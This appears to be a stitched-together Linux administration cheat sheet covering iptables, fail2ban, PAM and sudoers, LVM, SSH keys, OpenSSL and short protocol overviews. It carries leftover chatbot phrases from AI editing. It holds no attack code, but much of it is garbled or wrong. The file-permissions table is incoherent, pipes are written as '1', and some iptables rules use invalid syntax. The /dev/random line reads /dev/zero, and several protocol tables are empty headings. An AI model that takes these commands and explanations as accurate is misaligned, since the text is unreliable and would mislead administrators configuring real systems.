IPTables Persistence

# Search for iptables-persistent package
aptitude search iptables-persistent

# Edit the persistent IPTables rules file
nano /etc/iptables/rules.v4

# List current IPTables rules
iptables -L

Explanation of IPTables Commands

1. iptables -nvL: Lists all IPTables rules with numeric values and doesn’t show interfaces.

2. iptables -A INPUT -s 192.168.12.139 -j REJECT: Adds a rule to the INPUT chain that rejects packets from the specified IP address.

3. iptables -L --line-number: Displays IPTables rules with line numbers for easy reference.

4. iptables -D INPUT 1: Deletes the first rule in the INPUT chain.

5. iptables -R INPUT 1 -j ACCEPT: Replaces the first rule in the INPUT chain with an ACCEPT rule.

6. iptables-save > /etc/iptables.conf: Saves the current IPTables configuration to a file named /etc/iptables.conf.

7. iptables-restore < /etc/iptables.conf: Restores IPTables rules from the previously saved file.

8. aptitude search iptables-persistent: Searches for packages related to persistent IPTables rules.

9. nano /etc/iptables/rules.v4: Edits the file containing persistent IPTables rules.

10. iptables -L: Lists all current IPTables rules.

Example IPTables Configuration

The example configuration file shows several common rules:

• :INPUT ACCEPT [15:1380]: Sets the default policy for INPUT to ACCEPT.
• :FORWARD ACCEPT [0:0]: Sets the default policy for FORWARD to ACCEPT.
• :OUTPUT ACCEPT [3:444]: Sets the default policy for OUTPUT to ACCEPT.
• -A OUTPUT -d facebook.com -j DROP: Drops packets destined for facebook.com.
• -A OUTPUT -p tcp --dport 22 -j DROP: Drops TCP traffic on port 22 (SSH).
• -A INPUT -p tcp -m multiport --dports 80,443 -j ACCEPT: Accepts TCP traffic on ports 80 and 443.
• -A INPUT -p icmp eth0 -j REJECT: Rejects ICMP traffic on interface eth0.
• -A INPUT -p tcp -j REJECT: Rejects all other TCP traffic.

This configuration demonstrates various filtering techniques, including:

• Blocking specific domains (facebook.com)
• Disallowing SSH access
• Allowing HTTP/HTTPS traffic
• Rejecting ICMP traffic
• Rejecting all other TCP traffic

Remember to adjust these rules according to your specific security requirements and network setup. Always test changes in a controlled environment before applying them to production systems.

Thank you for providing the additional content about IPTables. I’ll correct and fix errors, elaborate on the commands, and provide explanations for each part. Here’s the corrected and expanded version:

# Example of DROP
iptables -A INPUT -p tcp --dport 22 -j DROP

# Example of REJECT
iptables -A INPUT -p tcp --dport 23 -j REJECT --reject-with tcp-reset

In summary, the choice between DROP and REJECT depends on your desired behavior for handling unwanted packets:

• DROP: Silently discards packets without sending a response.
• REJECT: Sends an ICMP error message back to the sender.

# Enable IP forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward

# Set up port redirection
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

# Display routing table
ip route

# Display network interface configuration
ifconfig

# Display IPv4 addresses
ip addr

# Save IPTables configuration
sudo iptables-save

# List IPTables rules
sudo iptables -L

# List IPTables rules with line numbers
sudo iptables -L --line-numbers

# Delete the third rule in the INPUT chain
sudo iptables -D INPUT 3

# Add a route (note: syntax error corrected)
sudo ip route add 10.0.0.0/8 via 192.168.12.100

# Check if kube-dns service is allowed
iptables-save | grep kube-dns

# Restart networking service
sudo systemctl restart networking

# Check if port 2375 is open
netstat -nap | grep :2375

# Allow port 5000 through UFW firewall
sudo ufw allow 5000

# Display eth0 interface configuration
ifconfig eth0

# List IPTables rules (corrected syntax)
iptables -L | more

# List NAT rules
iptables -L -n -v -t nat

# Save IPTables configuration to a file
sudo iptables-save > /etc/iptables.conf

# Restore IPTables configuration from a file
sudo iptables-restore < /etc/iptables.conf

Explanation of IPTables Commands

1. iptables -A INPUT -p tcp --dport 22 -j DROP: Adds a rule to drop all incoming TCP traffic on port 22 (SSH).

2. iptables -A INPUT -p tcp --dport 23 -j REJECT --reject-with tcp-reset: Adds a rule to reject incoming TCP traffic on port 23 (Telnet) and sends a reset packet back to the sender.

3. echo "1" > /proc/sys/net/ipv4/ip_forward: Enables IP forwarding, allowing the system to act as a router.

4. iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222: Sets up port redirection from port 22 to port 2222.

5. ip route, ifconfig, ip addr: Display network routing information and interface configurations.

6. sudo iptables-save and sudo iptables -L: Save and list IPTables rules.

7. sudo iptables -L --line-numbers: Lists IPTables rules with line numbers for easy reference.

8. sudo iptables -D INPUT 3: Deletes the third rule in the INPUT chain.

9. sudo ip route add 10.0.0.0/8 via 192.168.12.100: Adds a routing entry for the 10.0.0.0/8 network via the gateway 192.168.12.100.

10. iptables-save | grep kube-dns: Searches for rules related to the kube-dns service.

11. sudo systemctl restart networking: Restarts the networking service.

12. netstat -nap | grep :2375: Checks if port 2375 is open.

13. sudo ufw allow 5000: Allows traffic through UFW firewall for port 5000.

14. ifconfig eth0: Displays configuration for the eth0 interface.

15. iptables -L | more: Lists IPTables rules with pagination.

16. iptables -L -n -v -t nat: Lists NAT-related IPTables rules.

17. sudo iptables-save > /etc/iptables.conf: Saves IPTables configuration to a file named /etc/iptables.conf.

18. sudo iptables-restore < /etc/iptables.conf: Restores IPTables configuration from the saved file.

These commands demonstrate various IPTables operations including rule creation, viewing, saving, restoring, and modifying. Remember to be cautious when modifying firewall rules, especially in production environments, and always test changes in a controlled manner.

Citations: [1] https://todisco.de/en/blog/iptables-reject-vs-drop [2] https://serverfault.com/questions/157375/reject-vs-drop-when-using-iptables [3] https://www.baeldung.com/linux/iptables-reject-vs-drop [4] https://forum.openwrt.org/t/iptables-difference-between-drop-and-reject/64738 [5] https://bobcares.com/blog/iptables-drop-vs-reject/ [6] https://unix.stackexchange.com/questions/109459/is-it-better-to-set-j-reject-or-j-drop-in-iptables [7] https://medium.com/@turgenev.e9g/drop-vs-reject-how-to-make-linux-behave-like-windows-93e8df1be519 [8] https://www.coresentinel.com/reject-versus-drop/ [9] https://ale.ale.narkive.com/CNOcwe66/iptables-drop-vs-reject-reject-with-tcp-reset [10] http://www.chiark.greenend.org.uk/~peterb/network/drop-vs-reject

Resources

free m
nano /etc/anacrontab 
watch free -m cd /var/log/
du -h --max-depth=1
cd du -h --max-depth=1
cd du -h --max-depth=1
iostat vmstat
vmstat -M
vmstat -s -M
vmstat -S -M
vmstat -S M
ps -eo pcpu,pid,user,args 1 sort -k 1 -r 1 head -10
ps aux 1 grep rsyslog
ps aux 1 grep init 
uptime date lsof /home/carmen
lsof -c rsyslig 
lsof -c rsyslog
history 1 grep logrotate 

Linux-System

cat /etc/issue => get version
man pgrep
pgrep firefox
ps j | more
ps aux

tty = > action => alt+ctl+f7

top

kill -l (signals)
kill -SIGSTOP 2375
kill -SIGCONT (OR 18 base on kill -l) 2375
kill -SIGKILL 2375

chage -l username

apt search axel
apt show axel

OS

systemctl status kubelet
systemctl cat kubelet.service
systemctl restart systemd-logind.service
sudo /etc/init.d/docker restart

Run level / Target: systemctl get-default

ls /etc/systemd/system
nano /etc/default/graub
pstree | more
man systemctl
systemctl list-units
systemctl list-units --type=service --state=running
systemctl is-enabled docker.service
systemctl is-active docker.service
systemctl reload docker.service
systemctl reload-or-restart docker.service
systemctl list-dependencies --after/before docker.service
systemctl status sshd.service
systemctl status logrotate.service
systemctl status crond.service
systemctl mask/umask docker.service
sudo apt update  

Log OS

Journal

systemd status systemd-journald.service
sudo journalctl -f
journalctl -u docker
journalctl -u etcd-member -f
journalctl –f
fleetctl list-machines
journalctl -r */realtime
journalctl -b */boot 
journalctl -k */kernel
journalctl --since "today"
cat /etc/systemd/journald.conf
```bash

#### Kernel logs

```bash
tail -20 /var/log/boot.log
dmesg | tail 20
cat /etc/logrotate.conf

User Managmenet & Permissions

adduser "username"
userdel "username"
killall -U "username"
sudo usermod  -a -G sudo "username"

Permissions

+———+———–+———–+———–+
| Symbol | Permission| Owner | Group | Other users |
+———+———–+———–+———–+
| d | Directory | r (read) | r (read) | r (read) |
| w | Write | w (write) | - | - |
| r | Read | x (execute)| x (execute) | - |
| x | Execute | r (read) | r (read) | x (execute)|
| - | No access | - | - | - |
| x | Execute | - | - | x (execute)|
+———+———–+———–+———–+
| | | | | |
| | | User | Group | Other |
+———+———–+———–+———–+

For example, dwrx(UserOwner)-xr(Group)-x(Others)

User Management

# Add a new user
adduser armanriazi

# View account status and expiration information
chage -l armanriazi

# Remove SUID permission from a file
chmod u-s file1

# Add Sticky Bit to a file
chmod +t /test

# Add write permission for others to a file
chmod o+w /test

# Remove Sticky Bit from a file
chmod -t /test

Explanation of File Permissions Commands

1. adduser armanriazi: Adds a new user to the system. This command prompts for various details such as full name, room number, shell, etc., unless you provide arguments.

2. chage -l username: Displays the last change information for a user’s account. This includes password expiration details, minimum days, maximum days, warning period, and last password change.

3. chmod u-s file1: Removes the SUID (Set User ID) bit from the file. This prevents the file from automatically inheriting the privileges of the owner when executed.

4. chmod +t /test: Adds the Sticky Bit to the file. The Sticky Bit prevents users from deleting or renaming files owned by other users, even if they have write permissions.

5. chmod o+w /test: Adds write permissions for others to the file.

6. chmod -t /test: Removes the Sticky Bit from the file.

Additional Information on Permissions

• SUID (Set User ID): When set on an executable file, it runs with the privileges of the owner rather than the executing user.
• SGID (Set Group ID): Similar to SUID but applies to group ownership.
• Sticky Bit: Prevents deletion or renaming of files owned by other users, even for those with write permissions.

These commands demonstrate various ways to modify file permissions in Linux systems. The chmod command is versatile and can be used with both symbolic notation (u-s, -t, o+w) and numeric notation (e.g., 755).

Remember that modifying permissions should be done carefully, especially when dealing with system files or directories. Always ensure you have the necessary privileges before making changes to file permissions.

Citations: [1] https://www.redhat.com/en/blog/suid-sgid-sticky-bit [2] https://www.cbtnuggets.com/blog/technology/system-admin/linux-file-permissions-understanding-setuid-setgid-and-the-sticky-bit [3] https://www.redhat.com/en/blog/linux-file-permissions-explained [4] https://linuxhandbook.com/suid-sgid-sticky-bit/ [5] https://www.howtogeek.com/656646/how-to-use-suid-sgid-and-sticky-bits-on-linux/ [6] https://www.geeksforgeeks.org/setuid-setgid-and-sticky-bits-in-linux-file-permissions/ [7] https://www.linuxfoundation.org/blog/blog/classic-sysadmin-understanding-linux-file-permissions [8] https://www.liquidweb.com/blog/how-do-i-set-up-setuid-setgid-and-sticky-bits-on-linux/ [9] https://learning.lpi.org/en/learning-materials/010-160/5/5.3/5.3_01/

PAM (Pluggable Authentication Modules)

User Management

PAM manages user authentication for various services in Linux. Passwords are stored in /etc/shadow, which contains hashed passwords.

Security Patching on Linux

Always ensure your system is up-to-date with the latest security patches.

# Update source list to include Debian security updates
sudo nano /etc/apt/sources.list
deb http://security.debian.org/ jessie/updates main contrib non-free

# Update package list and upgrade installed packages
sudo aptitude update && sudo aptitude upgrade

# Check the status of a specific package (e.g., libgnutls-openssl27)
apt-cache policy libgnutls-openssl27

Basic PAM Configuration

To configure a specific service (e.g., git-shell):

sudo nano /etc/pam.d/git-shell
# Add these lines:
auth required pam_unix.so  
account required pam_unix.so

Common PAM Configurations

The common-auth, common-account, and common-password files include configurations for all services.

# View the common-auth configuration
grep -v "^#" /etc/pam.d/common-auth

# Ensure the following line is included in your SSHD config
sudo nano /etc/pam.d/sshd
@include common-auth

# Common password handling configuration
sudo nano /etc/pam.d/common-password
@include common-password

Password Management

Restrict User from Using Old Password

To prevent users from reusing past passwords:

sudo nano /etc/pam.d/common-password
# Add this line to ensure passwords are remembered
password sufficient pam_unix.so use_authok md5 shadow remember=10

Set Password Expiration Policies

Use the chage command to enforce password expiry rules:

chage -l arman # Check current expiration settings
sudo chage -M 60 -m 7 -W 3 arman # Set max 60 days, min 7 days, warn 3 days

Enforce Strong Password Policies

Install the libpam-pwquality package for stronger password enforcement:

# Search for the package
aptitude search libpam-pwquality

# Configure password quality requirements
sudo nano /etc/security/pwquality.conf
minlen=9
minclass=2
maxrepeat=3
maxclassrepeat=4

# Ensure pam_pwquality is in common-password
sudo nano /etc/pam.d/common-password
# Ensure retry=3 is configured

Sudo Access Management

Use the sudo command to provide users with elevated privileges.

Configure Sudoers File

Always use visudo to edit the sudoers file to prevent syntax errors:

# Check current sudoers file
ls -l /etc/sudoers
sudo visudo
# Ensure to change the editor if necessary
update-alternatives --config editor

Granting Access to Groups

# Add users to the sudoers file
# Example for granting specific permissions
## User privilege specification
root ALL=(ALL:ALL) ALL 
arman ALL=(ALL:ALL) ALL 
jessie ALL=(ALL)NOPASSWD: /etc/init.d/apache2 reload 

# Create a new group and manage user permissions
sudo groupadd group1
sudo adduser jessie group1

# Allow group 1 to execute updates without a password
sudo nano /etc/sudoers.d/group1
%group1 ALL=NOPASSWD: /usr/bin/apt-get update

# Define user aliases and command aliases for cleaner management
User_Alias GROUPONE = arman,jessie
Cmnd_Alias POWER = /sbin/reboot, /sbin/shutdown
GROUPONE ALL=POWER

Secure Root Login and Define Secure TTY

To prevent root from logging in directly via SSH:

# Change the shell for root to disable direct login
sudo nano /etc/passwd
# Change to:
root:x:0:0:root:/root:/sbin/nologin

# Configure securetty to restrict root login sources
sudo nano /etc/securetty
# Add only the TTY devices from which root should be allowed to log in

Implementing Two-Factor Authentication (2FA)

Consider implementing 2FA for additional security layer:

# Install necessary packages
sudo apt-get install libpam-google-authenticator

# Configure for the user
google-authenticator

Regular Audits and Compliance Checks

Schedule regular audits of PAM configurations, user privileges, and installed packages. Consider tools like Lynis or OpenSCAP for compliance checking.

Checking which service using PAM

ldd /bin/login | grep libpam
whereis apache2
ldd /usr/sbin/apache2 | grep libpam
whereis git
ldd /usr/bin/git | grep libpam

This revised version organizes the content into clear sections with appropriate headings, corrects minor errors, and maintains all the original information while improving readability and structure.

Citations: [1] https://ubuntu.com/landscape/docs/pam-authentication [2] https://www.tecmint.com/configure-pam-in-centos-ubuntu-linux/ [3] https://manpages.ubuntu.com/manpages/jammy/en/man5/pam.conf.5.html [4] https://askubuntu.com/questions/513081/how-do-i-change-options-in-pam-configuration [5] https://www.miniorange.com/pam/pam-ubuntu-installation-guide [6] https://manpages.ubuntu.com/manpages/lunar/man7/PAM.7.html [7] https://www.geeksforgeeks.org/what-is-linux-pam-module-and-how-to-configure-it/ [8] http://docs.pingidentity.com/pingid/pingid_integrations/pid_configuration_example_pam_ubuntu_debian.html [9] https://www.digitalocean.com/community/tutorials/how-to-use-pam-to-configure-authentication-on-an-ubuntu-12-04-vps [10] https://learn.microsoft.com/en-us/azure/defender-for-iot/device-builders/configure-pam-to-audit-sign-in-events

Thank you for providing the additional content about Fail2ban. I’ll correct and fix errors, elaborate on the commands, and provide explanations for each part. Here’s the corrected and expanded version:

Fail2ban

Fail2ban is a powerful tool designed to protect servers from brute-force attacks by blocking IP addresses after multiple failed login attempts.

# Install Fail2ban
aptitude search fail2ban

# Navigate to Fail2ban directory
cd /etc/fail2ban

# Copy the default configuration file
cp jail.conf jail.local

# Edit the Fail2ban configuration file
nano jail.local

# List Fail2ban rules in iptables
iptables -L

# Navigate to Fail2ban action directory
cd /etc/fail2ban/action.d

# Edit the iptables configuration file
nano iptables.conf

# Check Fail2ban status for all jails
fail2ban-client status

# Check Fail2ban status specifically for SSH jail
fail2ban-client status ssh

# Reload SSH jail configuration
fail2ban-client reload ssh

# Stop Fail2ban service
fail2ban-client stop

# Edit the Fail2ban jail.local file
nano /etc/fail2ban/jail.local

# Remove a specific Fail2ban rule from iptables
iptables -D fail2ban-ssh 1

# Unban an IP address blocked by Fail2ban
fail2ban-client set ssh unbanip 192.168.12.133

# List iptables rules again
iptables -L

# Test SSH access from the unbanned IP
ssh user@ip

Explanation of Fail2ban Commands

1. aptitude search fail2ban: Searches for the Fail2ban package in the system repositories.

2. cd /etc/fail2ban: Changes directory to the Fail2ban configuration files location.

3. cp jail.conf jail.local: Creates a copy of the default configuration file with a .local extension, which allows for local overrides.

4. nano jail.local: Edits the local Fail2ban configuration file.

5. iptables -L: Lists all iptables rules, including those added by Fail2ban.

6. cd /etc/fail2ban/action.d: Changes directory to the Fail2ban action scripts directory.

7. nano iptables.conf: Edits the Fail2ban iptables action configuration.

8. fail2ban-client status: Displays the status of all Fail2ban jails.

9. fail2ban-client status ssh: Shows the status specifically for the SSH jail.

10. fail2ban-client reload ssh: Reloads the configuration for the SSH jail without restarting the service.

11. fail2ban-client stop: Stops the Fail2ban service.

12. nano /etc/fail2ban/jail.local: Edits the local Fail2ban jail configuration file.

13. iptables -D fail2ban-ssh 1: Deletes the first rule in the fail2ban-ssh chain.

14. fail2ban-client set ssh unbanip 192.168.12.133: Unbans the specified IP address from the SSH jail.

15. iptables -L: Lists iptables rules again after making changes.

16. ssh user@ip: Tests SSH access from the unbanned IP address.

Fail2ban is a powerful tool for enhancing server security by automatically blocking IP addresses that show signs of brute-force attacks. It works by monitoring various log files (like SSH logs) and taking action based on predefined rules.

Remember to configure Fail2ban according to your specific needs and security requirements. Always test configurations in a controlled environment before applying them to production systems.

Citations: [1] https://www.linode.com/docs/guides/using-fail2ban-to-secure-your-server-a-tutorial/ [2] https://www.plesk.com/blog/various/using-fail2ban-to-secure-your-server/ [3] https://webdock.io/en/docs/how-guides/security-guides/how-configure-fail2ban-common-services?srsltid=AfmBOoqN1aZQrzkUqiAz1sDg8wd-yucR5vJpLU6kCVWDJmTCw3c4Iv17 [4] https://gist.github.com/mgeeky/fc3a8d8e9cb06f31aac20fab7872d531 [5] https://www.a2hosting.com/kb/security/hardening-a-server-with-fail2ban/ [6] https://www.digitalocean.com/community/tutorials/how-to-protect-ssh-with-fail2ban-on-ubuntu-20-04 [7] https://www.tecmint.com/use-fail2ban-to-secure-linux-server/ [8] https://www.hostinger.com/tutorials/fail2ban-configuration [9] https://www.secopsolution.com/blog/install-and-configure-fail2ban [10] https://www.youtube.com/watch?v=kgdoVeyoO2E

LVM-Disk

Notice

partprobe

to force the kernel to re-read the partition table so that it is not necessary to perform a reboot.

Get Status

• lsblk -f

• pvscan

• vgs -o +devices,lv_path

• vgdisplay

• lvmdiskscan

Add Disk

fdisk /dev/sdX

• Regular disk: n => (Enter All)=>p => t => 8e = changes to LVM partition type=>w
• Swap disk: n => (Enter All)=>p => t => 82 = changes to SWAP partition type=>w

Create Partition

pvcreate /dev/sdX1

Create Logical Volume

lvcreate -l 100%FREE -n lvubuntu vgubuntu

vgextend vgubuntu /dev/sdX

To enable logical volumes before mount LVs to the path eg., /mnt/docker

vgchange -an vg

For Regular Disk

When you have made a LV, it is not assigned to the FSTYPE, so we need to assign mkfs.ex4

# mkfs -t ext4 /dev/vgubuntu/lvubuntu
sudo mkfs.ext4 /dev/vgubuntu/lvdocker
mount -t ext4 /dev/vgubuntu/lvubuntu /mnt/X/

To check is the FSTYPE assigned or not

lsblk --output NAME,KNAME,TYPE,SIZE,MOUNTPOINT,FSTYPE

Output similarity:

NAME                  KNAME TYPE  SIZE MOUNTPOINT  FSTYPE
sda                   sda   disk   50G
├─sda1                sda1  part    1M
└─sda2                sda2  part   50G /           ext4
sdb                   sdb   disk  100G
├─sdb1                sdb1  part   50G             LVM2_member
│ └─vgubuntu-lvubuntu dm-0  lvm   100G
└─sdb2                sdb2  part   50G             LVM2_member
  └─vgubuntu-lvubuntu dm-0  lvm   100G
sdc                   sdc   disk   50G             LVM2_member
└─vgubuntu-lvdocker   dm-1  lvm    50G /mnt/docker ext4

Final step is mounting:

sudo mount /dev/vgubuntu/lvdocker /mnt/docker

For Swap Disk

mkswap /dev/vgubuntu/swap
mkswap /dev/mapper/vgubuntu-swap
swapon -v /dev/vgubuntu/swap

partprobe
swapon -va
cat /proc/swaps
Free -h

Fstab Boot

sudo nano /etc/fstab

# <file system> <mount point>   <type>  <options>       <dump>  <pass>
/dev/mapper/vgubuntu-root /               ext4    errors=remount-ro 0       1
/dev/mapper/vgubuntu-swap   swap     swap    defaults     0 0
# /boot/efi was on /dev/sda1 during installation
UUID=9fd9c344-09a7-4bbf-af88-9b4e1c24955d       /mnt/docker    ext4    defaults        0       2
/dev/mapper/vgubuntu-home /mnt/home ext4 errors=remount-ro,x-gvfs-show,x-udisks-auth,x-gvfs-name=mnt-home 0 1
/dev/mapper/vgubuntu-sub /mnt/sub ext4 errors=remount-ro,x-gvfs-show,x-udisks-auth,x-gvfs-name=mnt-sub 0 1

# enable using back slash
echo -e ""
# write to a file
echo "aaa" > filename

history
cat .bash_history

Access to files

# Show line no. and desc
cat a.txt -n | more
# Easy Show each paraph with $ sign
cat a.txt -e
# Input to file a text
cat > a.txt
# Copy a file content/Ovveride
cat a.txt >> empty.txt

# move some file
mv a.txt b.txt /Desktop
# Hidden file
mv a.txt .a.txt
# UnHidden file
mv .a.txt a.txt

# Copy and make a hidden file
cp a.txt /Desktop/.a.txt
cp -r ...

# make 3 directory 
mkdir -p /a/b/c

# Force remove all tree 
rm -r -f /a/b/

gzip filename
gunzip filename

uname -s -r -v -o
hostname
loginame

Symbolic

# Shortcut file or folder
ln -s ~/Video/ ~/Desktop

FileSystem

du -sh ./*
df -h ./*
df -lh
ls -li .
ls -ld /dev
df -hT # mounted file systems
cd /home
ls or dir
ls -al armanriazi/
su armanriazi
cd ~/
pwd
touch text.txt
mv text.txt test.txt
cat test.txt =>Show contain of file  or for web content=>curl yourip
vi index.html =>for create and editable file,manipulate file content
rmdir foo =>OR rm Rv data/
:qa! =>OR :wq  at the end of edit file for exit

lsattr testfile
chattr +a testfile
echo "1" >>testfile

swapon -s

umask

VFS

uname -ra
ls -l /proc/ | more
cat /proc/cpuinfo
cat /proc/meminfo | more
cat /proc/swaps
cat /proc/partitions

# Special File:
# Block File :
Ls –la /dev |grep ‘^b’

#Then Type:
stat /dev/sda

#Character File:
Ls –la /dev |grep ‘^c’

#Symbolic Link:
Ls –la /dev |grep ‘^l’

#Pipes:
Ls –la /dev |grep ‘^p’

#Socket:
Ls –la /dev |grep ‘^s’

# Directory:
ls –lha /home |grep ‘^d’

/dev/zero od -An -N1 -i /dev/zero
/dev/random od -An -N1 -i /dev/zero
/dev/null cp /*.txt ~ 2>/dev/null


lsblk
ls -i

find / -inum 2435

Helper

Known Fingerprint is use to verify the server’s identity to the client

Install

sudo apt-get install openssh-server
sudo apt install openssh-client
sudo apt-get  update

sudo service ssh start
Install the SSH public key on the node#
sudo cat $HOME/.ssh/id_rsa.pub | ssh rke@172.18.3.10 "tee -a /home/rke/.ssh/authorized_keys"

Banner Login/Logout

/etc/issue.net
# write:
# Unauthorized access to this server is prohibited. All the activites are being logged
# exit
/etc/ssh/sshd_config
# add:
Banner /etc/issue.net
PrintMotd yes
# exit
nano /etc/motd
/etc/init.d/ssh restart
ssh user@ip

Disable root connection

sudo nano /etc/ssh/sshd_config
PermitRootLogin #yes/no/without-password

Blacklist users from ssh

/etc/ssh/sshd_config
# search AllowUser
AllowUsers     arman user1
# exit nano
/etc/init.d/ssh restart

Example scp

scp/home/ubuntu1604rzero/MyIndexRancher/Scripts/MyScriptUpWorker.sh ubuntu1604rthree@172.18.3.17:~/
sudo ssh-keygen -t rsa -b 4096 -C rke@172.18.3.10
sudo ssh-keygen -t rsa -b 2048 -C rke@172.18.3.10

sudo cat /home/rke/.ssh/id_rsa.pub
sudo cat /home/rke/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys

sudo ssh -i $HOME/.ssh/id_rsa rke@172.18.3.10 docker version
ssh-keyscan -p 22 172.18.3.10
ssh-keyscan -p 22 k8s-master

sudo ssh-copy-id -i /home/rke/.ssh/id_rsa master@172.18.3.10

sudo ssh rke@172.18.3.10 -v -i $HOME/.ssh/id_rsa
sudo ssh -i $HOME/.ssh/id_rsa rke@172.18.3.10
eval $(ssh-agent) OR sudo exec ssh-agent bash
ssh-add $HOME/.ssh/id_rsa
echo $SSH_AGENT_SOCK
ssh-add -K -S
ssh-add -X #unlock
ssh-add -l ssh-add -L ssh-add -K ssh-add -D
sudo ssh workertwo@172.18.3.16

.\ssh-keygen.exe -l -f "c:\cert\ssh\my-vsts" -E sha256
ssh -T git@github.com

sudo gedit /etc/ssh/sshd_config

PermitRootLogin yes=>to file :/etc/ssh/sshd_config

#If you have any issues and need to fix permissions issues, run the following comand:
tail -f /var/log/secure
tail -f /var/log/auth.log
restorecon -R -v /root/.ssh

Make secure your server

• Configuration generator by Mozilla • Further detalis: Server Side TLS, Crypt Setup

Install

wget -c https://www.openssl.org/source/openssl-1.0.2p.tar.gz
tar -xzvf openssl-1.0.2p.tar.gz

openssl req -newkey rsa:2048 -nodes -keyout /etc/ssl/private/rancher.yourdomain.ir.key -x509 -days 365 -out /etc/ssl/certs/rancher.yourdomain.ir.crt
openssl req -newkey rsa:4096 -new -nodes -x509 -days 365 -keyout ./private/cakey.pem -out cacert.pem
openssl req -new -newkey rsa:2048 -nodes -keyout ./requests/rancher.yourdomain.ir.pem -out ./requests/rancher.yourdomain.ir.csr

openssl ca -in rancher.yourdomain.ir.csr -out rancher.yourdomain.ir.crt
openssl x509 -text -noout -in /root/ca/cacerts.pem
openssl s_client -showcerts -connect rancher.yourdomain.ir:443

Here’s a concise cheat sheet for the Internet Control Message Protocol (ICMP), including information about its types, error handling, and queries presented in tabular format for clarity.

ICMP Cheat Sheet

Overview

• ICMP (Internet Control Message Protocol) is a network layer protocol used by network devices to send error messages and operational information indicating success or failure during communication.

Common Uses

• Error Reporting: Notify hosts of issues in communications.
• Diagnostics: Used in tools like ping and traceroute.

ICMP Types Table

ICMP Error Handling Table

In the context of ICMP (Internet Control Message Protocol), the numbers 3 and 0 refer to specific fields in the ICMP message that indicate the type of error and the code associated with that type.

ICMP Error Message Structure

ICMP messages typically have the following header fields:

1. Type (8 bits): Indicates the type of the message (e.g., error message or echo request).
2. Code (8 bits): Provides additional context for the type (gives more specific information about the error).
3. Checksum (16 bits): Used for error-checking the header and data.
4. Unused (32 bits): Usually set to zero, used in some ICMP types for future use.
5. Identifier (16 bits): An identifier used for matching requests with replies (used in echo requests/replies).
6. Sequence Number (16 bits): A sequence number for the echo requests/replies to track multiple messages (used in echo requests/replies).

Specific Example

For the ICMP message type you provided:

• Type = 3: This indicates Destination Unreachable, which is the type of the ICMP message.
• Code = 0: This indicates Network Unreachable.

The Type and Code together can help pinpoint exactly what the issue is within the broader category of destination unreachable messages.

ICMP Error Handling Table (Detailed)

Here’s the modified error handling table with specified headers, illustrating the connection between Type and Code:

Summary

• 3: ICMP Type for “Destination Unreachable”
• 0: ICMP Code for “Network Unreachable”

This table provides a clear understanding of the relationship between ICMP types and codes, helping network engineers and administrators troubleshoot issues effectively.

ICMP Queries Table

Key Characteristics

• Transport Protocol: ICMP operates at the network layer (Layer 3) of the OSI model.
• Connectionless: It does not establish a connection before sending messages.
• Error Handling: Allows hosts to communicate error and status information back to the sender.

Common Commands Related to ICMP

• Ping (Echo Request):

  • To check the reachability of a host:

  ping [hostname or IP]
  

• Traceroute (Trace Route):

  • To track the path packets take to reach a destination:

  traceroute [hostname or IP]  (Linux/Unix)
  

  tracert [hostname or IP]  (Windows)
  

This cheat sheet summarizes the key aspects of ICMP, including its function, types, error handling, and common queries. The tabular format provides easy reference to critical information, making it straightforward to understand ICMP’s role in network communications.

ARP Cheat Sheet

Overview

• ARP (Address Resolution Protocol) is used to map IP addresses to MAC (Media Access Control) addresses. It operates at the Data Link Layer (Layer 2) of the OSI model.

Common Uses

• Resolving IP addresses to MAC addresses for communication within a local area network (LAN).

ARP Message Types

ARP Packet Structure

IGMP Cheat Sheet

Overview

• IGMP (Internet Group Management Protocol) is used by hosts and adjacent routers on an IP network to establish multicast group memberships. It operates at the Network Layer (Layer 3) of the OSI model.

Common Uses

• Managing and controlling multicast groups in an IPv4 network.

IGMP Message Types

IGMP Packet Structure

SMB Cheat Sheet

Overview

• SMB (Server Message Block) is a network file sharing protocol used for providing shared access to files, printers, and serial ports. It operates at the Application Layer (Layer 7) of the OSI model.

Common Uses

• Accessing files and networks shares on remote servers.
• Printing to shared printers on the network.
• Interprocess communication between programs on the same server.

Common SMB Message Types

SMB Packet Structure

Common SMB Ports

Security Considerations

• SMB Signing: Provides integrity and authenticity for SMB communications.
• SMB Encryption: Protects data in transit to prevent eavesdropping and tampering.
• Guest Access: Should be disabled to prevent unauthorized access to shared resources.